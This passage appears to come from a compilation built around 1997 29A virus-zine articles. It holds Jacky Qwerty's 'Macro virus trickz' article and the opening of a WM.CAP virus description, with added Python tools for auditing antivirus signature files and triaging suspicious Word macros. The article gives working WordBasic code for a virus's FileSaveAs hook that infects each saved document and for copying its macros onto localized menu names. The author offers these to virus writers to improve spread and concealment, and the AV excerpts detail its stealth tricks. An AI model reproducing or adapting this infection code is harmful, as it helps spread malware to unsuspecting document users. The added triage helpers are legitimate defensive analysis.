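    name_z = name.encode("latin-1") + b"\0"
    code_size = AVR_HDR_LEN + len(code)           # word at 0ch: code size incl. header
    total = code_size + len(name_z)               # word at 0eh: header + code + name
    hdr = bytearray(AVR_HDR_LEN)
    hdr[1] = CONTROL_MARK                         # other header bytes unknown, left zero
    hdr[0x0A] = len(name_z)                       # byte at 0ah: name length incl. the 0
    struct.pack_into("<H", hdr, 0x0C, code_size)
    struct.pack_into("<H", hdr, 0x0E, total)
    body = bytes(b ^ XOR_KEY for b in code + name_z)
    return bytes(hdr) + body


def build_sig_file(avrs, sig_blob: bytes) -> bytes:
    """Constructed test data only: 128-byte header, AVR entries, then signature data."""
    hdr = bytearray(HEADER_LEN)
    paragraphs = sum((len(a) + 15) // 16 for a in avrs)
    struct.pack_into("<H", hdr, 0x70, paragraphs)     # paragraphs needed by the AVRs
    struct.pack_into("<I", hdr, 0x72, len(sig_blob))  # overall size of the signatures
    return bytes(hdr) + b"".join(avrs) + sig_blob


def audit_tbscan_sig(data: bytes):
    """Return (header_info, entries, findings) for a signature file image."""
    if len(data) < HEADER_LEN:
        raise ValueError("file shorter than the 128-byte header")
    info = {
        "avr_paragraphs": struct.unpack_from("<H", data, 0x70)[0],
        "sig_size": struct.unpack_from("<I", data, 0x72)[0],
    }
    entries, findings = [], []
    pos = HEADER_LEN
    while pos + AVR_HDR_LEN <= len(data) and data[pos + 1] == CONTROL_MARK:
        hdr = data[pos:pos + AVR_HDR_LEN]
        name_len = hdr[0x0A]
        code_size = struct.unpack_from("<H", hdr, 0x0C)[0]
        total = struct.unpack_from("<H", hdr, 0x0E)[0]
        if total < AVR_HDR_LEN or code_size < AVR_HDR_LEN or pos + total > len(data):
            findings.append(f"entry at {pos:#x}: size fields out of range "
                            f"(code {code_size}, total {total})")
            break
        if code_size + name_len != total:
            findings.append(f"entry at {pos:#x}: total {total} != code {code_size} "
                            f"+ name {name_len}")
        body = bytes(b ^ XOR_KEY for b in data[pos + AVR_HDR_LEN:pos + total])
        code = body[:code_size - AVR_HDR_LEN]
        name_raw = body[code_size - AVR_HDR_LEN:]
        name = name_raw.split(b"\0", 1)[0].decode("latin-1", "replace")
        if not name_raw.endswith(b"\0"):
            findings.append(f"entry at {pos:#x}: name '{name}' is not NUL-terminated")
        if not code or code[-1] != RETF:
            findings.append(f"entry at {pos:#x} ('{name}'): code does not end with retf")
        entries.append({"offset": pos, "name": name, "code": code, "total": total})
        pos += total
    info["avr_bytes"] = pos - HEADER_LEN
    if (info["avr_bytes"] + 15) // 16 > info["avr_paragraphs"]:
        findings.append("AVR data exceeds the paragraph count in the header")
    return info, entries, findings


# Constructed sample: the article's catch-all AVR (stc ; retf) plus an entry whose
# code lacks the closing retf, which the audit should flag.
SAMPLE_SIG = build_sig_file(
    [build_avr(b"\xf9\xcb", "Default_Virus"),
     build_avr(b"\x31\xc0\x90", "Suspicious_Entry")],
    b"\x00" * 40)                                     # placeholder signature data

if __name__ == "__main__":
    hdr_info, avr_entries, problems = audit_tbscan_sig(SAMPLE_SIG)
    for e in avr_entries:
        print(f"{e['offset']:#06x}  {e['name']:<20} {len(e['code'])} code bytes")
    for p in problems:
        print("FINDING:", p)
```

Run against a real TBSCAN.SIG the routine lists every AVR by name and offset; an entry with a name nobody in the team added, or one whose fields disagree, is what the IAVR-style insertion described above looks like from the defender's side.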

Macro virus trickz
> Jacky Qwerty/29A

This article is not intended to be a tutorial for macro virus writin. It simply states some common problemz and known limitationz with actual macro virii, then sugests solutionz and provides some code examplez for them. The reader should be already familiar with some of the conceptz surroundin macro virii stuff. If not, i sugest to read first a "real" tutorial about the subject and then jump back to this article.

Index

  1. Introduction
  2. The "SaveAs" problem
  2.1. The "SaveAs" solution
  2.2. The "SaveAs" example
  3. The "MultiLanguage suport" problem
  3.1. The "MultiLanguage suport" solution
  3.2. The "MultiLanguage suport" example
  4. Final Note
  5. Disclaimer

1. Introduction

One day while i was surfin the Web, unexpectedly found a couple of linkz containin Word macro virii stuff. After havin programed some DOS virii and researched about PE infection, one has to admit that the idea of a virus writen in WordBasic or VBA... mmm... well, sounds a bit stupid >8P (DS1, NJ: dont get mad... >8D) Indeed, macro virii seem stupid once u write one, but at that moment i had written none. After i downloaded and played with some of them, i actually understood not only how stupid macro virii were, but also Microsoft programerz. They're all clueless on what *security* means :)

2. The "SaveAs" problem

Just when i started to write my own macro virus, my atention was caught by an interestin mesage posted to alt.comp.virus. The topic was about that typical nuisance with macro virii that reveals their presence: the "SaveAs" problem. As i had thought, it was posible to overcome this, and that mesage from an expert AVer (well ehem) had just confirmed it. The "SaveAs" problem occurs when u try to save any infected document with another name usin the "FileSaveAs" command. After the "SaveAs" dialog box appears, u cant change the drive, nor the directory path, nor the format type. Word always saves your document in the "templatez" directory, unablin u to change it. This is bad for the common clueless user and bad for the virus too, as it reveals its presence by tellin him somethin is wrong. It also reduces its chancez to spread coz now the user cant take home his (infected) document as long as Word doesnt let him save documentz to his floppy disk, due to the "SaveAs" problem. I have thought of diferent wayz to overcome this, however i'll discuss the method i actually implemented in my WM.CAP virus.

2.1. The "SaveAs" solution

How do we solve this problem then? easy, very easy once we understand what an infected document really is. We cant forget that an infected document is really a "template", that why Word doesnt let us change the drive, nor the directory path, nor the format type. Becoz its a "template" and templatez belong to the templatez directory! Ok, but what if we make Word think that the infected document, sorry i meant the infected "template", is a genuine Word document? this would allow the user to select the drive, path and any type for the document! right? right! but how? Easy again, once we understand why Word provides "templatez": to make user's life easier by creatin documentz based on such templatez, got it? All we have to do is create a new document based on our active infected template! in other wordz we have to "emulate" the "SaveAs" function as if Word were saving a genuine document. Lets write some code to ilustrate.

2.2. The "SaveAs" example

Sub FileSaveAs                              ' Our "FileSaveAs" macro
  On Error Goto endFileSaveAs
  Dim dlg As FileSaveAs                     ' Declare dlg as FileSaveAs dialog box
  GetCurValues dlg                          ' Get current values into dlg
  If dlg.Format <> 1 Then                   ' Not a template? (i.e. not infected?)
    Dialog dlg                              ' No, a clean document, show box
    FileSaveAs dlg                          ' Save the new document
    Infect(dlg.Name)                        ' Infect it! go!
  Else                                      ' It's a template (i.e. it's infected)
    TempWindow = Window()                   ' Get current window (template)
    OriginalName$ = dlg.Name                ' Get original document name
    FileNew .Template = FileName$()         ' Create new doc based on template!
    On Error Goto CloseDoc                  ' Now on: if any error close new doc
    GetCurValues dlg                        ' Get current values for new doc
    dlg.Name = OriginalName$                ' Change doc name for original one
    Dialog dlg                              ' Ok, show FileSaveAs dialog box
    FileSaveAs dlg                          ' Save the new document
    On Error Goto endFileSaveAs             ' Now on: if any error just go
    Infect(dlg.Name)                        ' Ok, infect new document
    If TempWindow >= Window() Then          ' Get old template window number
      TempWindow = TempWindow + 1
    EndIf
    WindowList TempWindow                   ' Make it the active window
CloseDoc:
    FileClose 2                             ' Close it without promptin
  End If
endFileSaveAs:                              ' We're done! "SaveAs" problem fixed!
End Sub

The trick here is that the "FileSaveAs" subroutine behaves diferently acordin to the object bein saved. If the object is a genuine Word document (i.e. not infected), the routine simply shows the "SaveAs" dialog box and tries to infect it afterwardz. If the object bein saved is a "template" (i.e. perhaps an infected document) then the routine first creates a new document based on that active template (which is actually the infected document itself) and then shows the "SaveAs" dialog box from this newly created clean document. This time Word allows to choose the format type, drive letter and directory namez. After the user chooses the document name and saves it, the routine simply infects the document, swaps to the window containin the old template (i.e. the old infected document) and finally closes it leavin open the new "Saved-As" document just as Word itself does.

If at this point u're wonderin why we created a new "empty" document from the template, then u probably need some background info in Word macroz and templatez. The new created document is NOT "empty" as it was created from a template which was not empty. Remember that this template is really our infected document and as a result our new created document will contain the same text stuff as the template. Remember also the definition of what a "template" is and why we use them.

3. The "MultiLanguage suport" problem

This is a dificult topic and several diferent aproachez have been tried and implemented by different VXers in order to overcome it. However as to this writin, i still havent seen a single *reliable* multilanguage macro virus. The Wazzu virus consisted of a single automacro: AutoOpen. This makes it language-independent indeed but it still has the "SaveAs" problem, big deal. The "MultiLanguage suport" problem has to do with the fact that MS Word is available in diferent languagez and flavorz for diferent platformz. Whenever we give a macro the name of a menu item, Word will actually execute the code contained in such macro whenever the user clicks or presses the menu item asociated with it. However if the user executes the same action (clicks the same menu item) under another Word language, the asociated macro won't be executed at all becoz it doesnt match the menu item name as it was written in another language, u see? For example supose in english Word we program the "FileOpen" macro to do whatever action. Whenever we click the "File/Open" item, our macro will be executed. However supose we copy (unchanged) the same macro to another Word language, say spanish. Under this Word language the asociated file menu item changes now to "Archivo/Abrir". If we click this menu item, our old "FileOpen" macro won't be executed at all. However if we rename the macro to "ArchivoAbrir", this time it will execute just fine. This is what is known as the "MultiLanguage suport" problem.

3.1. The "MultiLanguage suport" solution (without AutoMacroz)

The best aproach to obtain multilanguage suport without losin control over the enviroment is interceptin the file menu related macroz, at least the "FileSaveAs" macro so we can fix the "SaveAs" problem. The best solution i came up with after thinkin a bit among the diferent alternativez was to intercept the file macroz directly acordin to the especific Word language instaled. This is not a dificult task, however what proves to be somewhat complicated is guessin out the correct macro name for the respective file menu item. If this step is done incorrectly, some file menuz will end up doin diferent actionz other than expected. For instance, the "FileSave" macro could end up callin "FileClose", thus closin the document instead of saving it or viceversa. In order to get the macro namez for the actual Word language instaled, we must use the "MenuItemMacro$" function. This function gives us the macro name for a given menu item inside a menu, asumin we know of course which menu this menu item refers or belongs to and knowin the menu item name or the menu item position inside this menu itself. Heh are u drowsy? =8-S. This is precisely the reason why this method is still not 100% reliable. We must asume fixed menu item positionz for the menu itemz we wanna hook. In any Word language from any standard Word instalation we have the followin scenario (equivalent spanish macroz are also shown):

  English       Spanish               Menu        Menu item position
  ----------    ------------------    --------    ------------------
  FileOpen      ArchivoAbrir          1 (File)    2
  FileClose     ArchivoCerrar         1 (File)    3
  FileSave      ArchivoGuardar        1 (File)    5
  FileSaveAs    ArchivoGuardarComo    1 (File)    6

This is precisely the method implemented in the WM.CAP virus in order to work in any Word language. It created aditional macro namez with same body but diferent name -acordin to the actual Word language instaled- for a given macro function. The fact that the macro code remains the same in any Word language is not a problem. The macro interpreter inside Word is "universal", meanin that it will execute correctly the WordBasic or VBA instructionz inside the macroz without carin about the actual Word language instaled. It needs however to refer to valid existin macro namez or labelz. As macro namez change for a given especific Word language, we must be very careful NOT to include any reference to a language-dependent macro name inside any of our file related macroz. This is the reason why such file related macroz inside WM.CAP are just short stubz ("wraperz") that jump to other subroutinez inside the CAP macro itself. Before showin an example to the "MultiLanguage suport" method, i must warn once again that this method is not 100% reliable. It all depends on how much the user has customized his Word menuz and other setingz. It should however work just perfect on those Wordz havin the factory standard setingz which gracely share all Word instalationz by default. Again in some especific user-customized Word instalationz, the latter method can easily mess up some of the file related macroz, resultin in unexpected behavior and weird funny actionz. Here follows the "MultiLanguage suport" example.

3.2. The "MultiLanguage suport" example

Dim Shared MacroName$(N)                      ' Array of stringz to hold the macro namez

Sub MAIN                                      ' Main subroutine
  [...]
  MacroName$(2) = "FileOpen"                  ' "FileOpen" at position 2 in file menu
  MacroName$(3) = "FileClose"                 ' "FileClose" at position 3 in file menu
  MacroName$(5) = "FileSave"                  ' "FileSave" at position 5 in file menu
  MacroName$(6) = "FileSaveAs"                ' "FileSaveAs" at position 6 in file menu

  FileMenu$ = MenuText$(0, 1)                 ' Get name for file menu ("&File")

  For MacroNumber = CountMacros(1) To 1 Step - 1   ' Process each macro
    Position = 0                              ' No position by now
    NameOfMacro$ = MacroName$(MacroNumber, 1) ' Get macro name
    Select Case MacroDesc$(NameOfMacro$)      ' Get description of macro name
      Case "FileOpen"                         ' Description = "FileOpen" ?
        Position = 2                          ' then position in file menu = 2
      Case "FileClose"                        ' Description = "FileClose" ?
        Position = 3                          ' then position in file menu = 3
      Case "FileSave"                         ' Description = "FileSave" ?
        Position = 5                          ' then position in file menu = 5
      Case "FileSaveAs"                       ' Description = "FileSaveAs" ?
        Position = 6                          ' then position in file menu = 6
    End Select
    If Position Then                          ' If position in file menu was found then..
      LocalMacro$ = MenuItemMacro$(FileMenu$, 0, Position)   ' Get localized macro name
      ' If local macro name is diferent from english name
      ' and local macro name is NOT a separator "(.." then
      If Left$(UCase$(LocalMacro$), Len(MacroName$(Position))) <> UCase$(MacroName$(Position)) And Left$(LocalMacro$, 1) <> "(" Then
        MacroCopy F$ + ":" + NameOfMacro$, LocalMacro$, -1   ' Copy macro to localized macro name
      End If
    End If
  Next                                        ' Process next macro

The objective in the previous example shows for itself. We're tryin to get the file related macro namez for any localized version of Word other than english. If these file related macroz are located in the exact position where we expect them to be in the file menu (very likely), then the above example will do its work. Probably at this point u're wonderin what has the macro description field to do in all this mess. Heh, well, the field proves to be very useful for some purposez other than simply describin what the macro does. The macro description field can be used to hold generation countz and self-recognition paternz, among other thingz. In the above example however, the description field mite not be necesary at all. Its purpose is simply to identify a given file related macro in order to assign a position for it in the file menu. But u could argue this can be done as well simply comparin the macro name retrieved from the "MacroName$" function with the required english macro name. Yes, u could, and it would work, as long as these english file related macroz keep stayin in the infected document. But u see, macro corruption, deletion and snatchin of macros are common nowadayz between macro virii due to the increasin number of existin samples of themselves. Becoz of this, the use of the macro description field (whenever posible) to recognize english or equivalent localized macro namez, makes the virus much more robust to macro corruptionz or undesired macro deletionz.
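Both trickz leave recognisable tracez in a template's macro list, which is what an analyst doing triage on a suspect .DOT looks for: a FileSaveAs that recreates the document from its own template before saving (section 2.2), a macro that reads names off the menu with MenuItemMacro$ and feeds them to MacroCopy (section 3.2), file-menu macroz that are only two-line stubz, and localized macro namez whose description field carries the English name. The following Python helper is an added example of that triage, not the article's code and not WM.CAP's. It works on a constructed dump of macro name, description and body text (the kind of listing a macro extraction tool produces), and the indicator patterns are assumptions drawn from the two examplez above rather than signatures for any particular sample.

```python
"""Triage heuristics for a WordBasic macro dump (added example for the "SaveAs" and
"MultiLanguage suport" trickz; not the article's code).  Each macro is checked for
the tracez those trickz leave, and the result says *why* a template looks hooked."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Macro:
    name: str          # macro name as listed in Tools/Macro
    description: str   # description field (the article uses it for self-recognition)
    body: str          # WordBasic source text


# English namez of the file-menu macroz the article hooks, plus the automacroz.
ENGLISH_HOOKS = {"FILEOPEN", "FILECLOSE", "FILESAVE", "FILESAVEAS",
                 "FILETEMPLATES", "TOOLSMACRO"}
AUTO_MACROS = {"AUTOEXEC", "AUTOOPEN", "AUTOCLOSE", "AUTONEW", "AUTOEXIT"}


def _has(body: str, pattern: str) -> bool:
    return re.search(pattern, body, re.IGNORECASE | re.MULTILINE) is not None


def triage_macros(macros: List[Macro]) -> Dict[str, List[str]]:
    """Map each macro name to the indicators it triggers (empty list = nothing found)."""
    report: Dict[str, List[str]] = {}
    for m in macros:
        hits: List[str] = []
        upname = m.name.upper()
        desc = m.description.strip().upper()
        code_lines = [ln for ln in m.body.splitlines()
                      if ln.strip() and not ln.strip().startswith("'")]
        # Section 2.2: the "SaveAs" emulation spawns a new document from the active
        # template (FileNew .Template = FileName$()) and then runs FileSaveAs on it.
        if (upname == "FILESAVEAS"
                and _has(m.body, r"FileNew\s+\.Template\s*=\s*FileName\$\(\s*\)")
                and _has(m.body, r"^\s*FileSaveAs\s+\w+")):
            hits.append("SaveAs emulation: recreates the document from its own "
                        "template before saving")
        # Section 3.2: localized hooking reads macro namez off the menu and copies
        # macros onto them; a trailing -1 makes the copy execute-only.
        if _has(m.body, r"MenuItemMacro\$\s*\(") and _has(m.body, r"\bMacroCopy\b"):
            hits.append("localized hooking: MenuItemMacro$ lookup feeding MacroCopy")
        if _has(m.body, r"\bMacroCopy\b.*,\s*-\s*1\s*$"):
            hits.append("MacroCopy with ExecuteOnly (-1): copy cannot be opened "
                        "for inspection")
        # Section 3.2: the description field used as a language-independent tag.
        if desc in ENGLISH_HOOKS and desc != upname:
            hits.append(f"localized copy of the English '{m.description}' macro, "
                        "identified by its description field")
        # The file hooks in the article are short stubz that jump into one big macro.
        if ((upname in ENGLISH_HOOKS or upname in AUTO_MACROS or desc in ENGLISH_HOOKS)
                and len(code_lines) <= 3
                and _has(m.body, r"^\s*(Call\s+)?\w+\.\w+\s*$")):
            hits.append("short stub that only calls into another macro")
        report[m.name] = hits
    return report


# Constructed macro dump: one hooked FileSaveAs, one Spanish stub copy, one
# "big" macro doing the copying, and one harmless user macro.
SAMPLE_DUMP = [
    Macro("FileSaveAs", "FileSaveAs",
          "Sub MAIN\nDim dlg As FileSaveAs\nGetCurValues dlg\n"
          "FileNew .Template = FileName$()\nGetCurValues dlg\n"
          "Dialog dlg\nFileSaveAs dlg\nEnd Sub\n"),
    Macro("ArchivoGuardarComo", "FileSaveAs",
          "Sub MAIN\nCAP.FileSaveAs\nEnd Sub\n"),
    Macro("CAP", "",
          "Sub MAIN\nFileMenu$ = MenuText$(0, 1)\n"
          "LocalMacro$ = MenuItemMacro$(FileMenu$, 0, 6)\n"
          "MacroCopy F$ + \":FileSaveAs\", LocalMacro$, -1\nEnd Sub\n"),
    Macro("ReportFormat", "Formats the quarterly report",
          "Sub MAIN\nFormatParagraph .Alignment = 1\nEnd Sub\n"),
]

if __name__ == "__main__":
    for name, hits in triage_macros(SAMPLE_DUMP).items():
        print(name, "->", hits or "clean")
```

The description-field check is the one the article's own argument points at: because a localized copy keeps "FileSaveAs" in its description while its name becomes "ArchivoGuardarComo", the tag that makes the virus robust against macro deletion is also what lets a reviewer pair each foreign-named macro with the English hook it duplicates.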

4. Final note

This article was written one or two months after Microsoft released its long expected Office'97, containin Word'97. Becoz of this and becoz i lost my interest in macro virii stuff since that time on, i dunno if these macro trickz will also work under Word'97, i guess not. However, if other VXerz are interested in these topicz and want to add more robustness to their macro virii under Word'97, they should consider the problemz described above. I hope this article could be useful for that purpose. Thats all, folkz.

5. Disclaimer

This information is for educational purposez only. The author is not responsible for any problemz caused by the use of this information.

(c) 1997. Jacky Qwerty / 29A.

WM.CAP virus description
> Jacky Qwerty/29A

This article gives a full description of the WordMacro CAP virus. It can be seen as a "real" example for the different techniqz described in the past article named "Macro virus trickz". Check out as well the virus source code, also published in this isue.

Index

  1. Introduction
  1.1. Macro virus hype
  2. WM.CAP: a complex word macro virus?
  3. In the Newz
  3.1. Dr.Solomon speaks
  3.2. Sophos speaks
  3.3. McAfee speaks
  3.4. F-Potatoe speaks
  3.5. Norton speaks
  3.6. AVP speaks
  3.7. Quarterdeck speaks
  4. Functional Description
  4.1. Removal of macroz
  4.1.1. Concept vs. Wazzu
  4.1.2. CAP vs. Concept
  4.2. Global template infection
  4.2.1. Searchin for localized macroz
  4.2.2. Incremental generation count
  4.2.3. Removal of menu itemz - stealth
  4.3. Document, template and RTF infection
  4.4. Disablin of AutoMacroz
  4.5. The "SaveAs" problem solved
  5. Shortcutz
  6. Disclaimer

1. Introduction

Factz prove for themselvez. Macro virii have become one of the most comon type of computer virus. While the latter sounds like a press release, we cant deny that unfortunately it is becomin true. "Unfortunately" becoz as u will see later, macro virii unlike other type of computer virii, are not really very dificult to write, in fact much of them have been coded in a very simple way, followin a straightforward programin aproach. While there could be some few exceptionz to the rule, macro virii in general dont prove to deserve that kind of atention that other more interestin type of computer virii mite do, regardin other innovative infection techniqz, new wayz of residency, improved methodz for trapin file activity and the complexity of the virus code itself. Featurez which are very dependent to a great extent on the skillz of the VXer himself.

1.1. Macro virus hype

But leavin aside that atonishin publicity surroundin macro virii and now followin a much more objetive aproach: what lies behind the creation of a macro virus? is it really hard to write such virusez? why so much hype bout Concept? well, not really. Much of that fuzz was nonsense, another press release biten and exagerated by the obfuscating media. I remember at the time Concept was big newz, AVerz started to say repeatedly again and again that such macro virii were fairly easy to write and that they could be more infectious and comon than any other virus type. Yea AVerz, strangely tho, said the mean and lean truth. So now they come, shoot our mindz and then wash their handz pretendin they have nothin to do with the macro virus hype. After all, we are the "kidz" so we are the guilty onez, we are the bad guyz and they are of course the heroez of the movie. Same old story.

2. WM.CAP: a complex macro virus?

CAP was a macro virus i wrote durin a bored December weekend after endin classes for the quarter and startin my xmas vacationz. It was also my first and last macro virus until i lost all of my interest in this stuff and focused my atention on other much more interestin virus related topicz :) It began as a curiosity of mine when tryin to understand for myself how these virusez worked and how much they could spread for themselvez. The CAP virus made its way into the wild the same way most other virusez do. It was writen in a simple 386 machine runin Windoze 3.1, it was tested in both english and spanish versionz of Word 6, and was finaly released and spread as with any other macro virus. Yea, it has some pretty kewl featurez but they are far from bein extraordinary or complex as some AVerz put it, especialy an AVer named Miko Hyppönen from Datafellowz (F-Potatoe), a very nice dude, author of F-Potatoe buletinz, who btw behaved very kind in his last isue when he encouraged people to send their "opinion on virus writin" to my Hotmail mailbox. I wont forget that one, Miko, very nice from u, pal. However it was also the first time i thanked the phuckin mother who hacked my Hotmail acount, hrmph @&%#..

3. In the newz

Shortly after CAP was released, there apeared a seriez of increasin reportz posted on several newsgroupz, especially from alt.comp.virus. Userz were suspectin about a new macro virus removin the Toolz/Macro and Toolz/Customize menu itemz from their Word enviroment. A couple of monthz later, CAP was bein reported at diferent regionz worldwide. Was CAP just another lucky virus or there was somethin more behind? Well, just keep readin if u want to know the mean and lean truth. #8) But before this lets listen to what AVerz have to say about CAP, that mite help us understand some more about CAP's functionin, mmm.. well, just a bit coz u know how some AVerz are, regardin their virus descriptionz. They feed on hype describin how good their AV programz detect virusez, instead of describin how the virusez really work and how some of them are able to defeat and nulify their stuff. Most of the AV programz agree they can safely remove all (removable) virusez they detect. Factz prove this is not true. None of the macro AV programz, except perhaps new versions of F-MacroW, have been able to remove properly all of the CAP spontaneously generated variantz. And as u'll see later in this article, this behavior could have been made much more complex on purpose.

3.1. Dr.Solomon speaks

(*) Dr.Solomon - http://www.drsolomon.com/vircen/valerts/wmcap.html

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/CAP

This macro virus appeared first in February 1997 and has quickly become widespread. The basic virus consists of one large macro called CAP (hence the name) which is called from the virus' other macros - AutoExec, AutoOpen, FileSave, FileSaveAs, FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose.

When the virus replicates, the first thing it does is to copy the basic set of 10 macros. The virus then browses the WinWord menu items, collects their names, (they could be different in different language versions, or customized versions of WinWord), and intercepts up to 5 of these additional macros - placing a pointer to the main CAP macro inside them. If there are any system macros defined in a global template before the infection - they are deleted. The virus also removes the menu items Tools/Macro and Tools/Customize. The File/Templates menu item is present after infection but it does not work.

In essence, then, the virus consists of 10 basic English macros and up to 5 additional macros taken from the menus if they are not standard for the English language version of WinWord. The virus uses information from the macro description field, (at the bottom of Tools/Macro box), for self recognition of its core macros. These have "F%" at the beginning of a description (FileOpen has F%O, FileClose - F%C, FileSave - F%S and FileSaveAs - F%SA).

The virus has no damaging payload except that it removes system macros defined in the global template.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

3.2. Sophos speaks

(*) Sophos - http://www.sophos.com/virusinfo/analyses/winwordcap.html

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus analyses

Winword/CAP

Virus Name: Winword/CAP.
Aliases: None known.
Type: MS Word document infector.
Resident: Yes, within Word environment.
Stealth: Yes. Empty macros are used to prevent Word showing menu items. For example, the ToolsMacro (or ExtrasMakro under German Word) is empty, which prevents the use of the ToolsMacro to see whether or not there are macros present. The virus also removes the menu item itself so that it does not even appear in the list of available choices.
Trigger: None.
Payload: None.
Comments: The Winword/CAP virus installs the following macros: FileTemplates, ToolsMacro, FileSaveAs, FileClose, AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and CAP. In addition, the virus will find the current local language version of the macros and will install these as well as the English ones. For example, if the virus infects a German version of Word, it will also install macros named DateiOffnen, DateiSpeichern, DateiSpeichernUnter, DateiSchliebenOderAllesSchlieben. With the exception of the CAP macro itself, all the macros are very short stubs which either call subroutines within CAP or do nothing at all.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

3.3. McAfee speaks

(*) McAfee - http://www.mcafee.com/support/techdocs/vinfo/vm007.asp

- - - - - - - - - - - - - - - - - - - -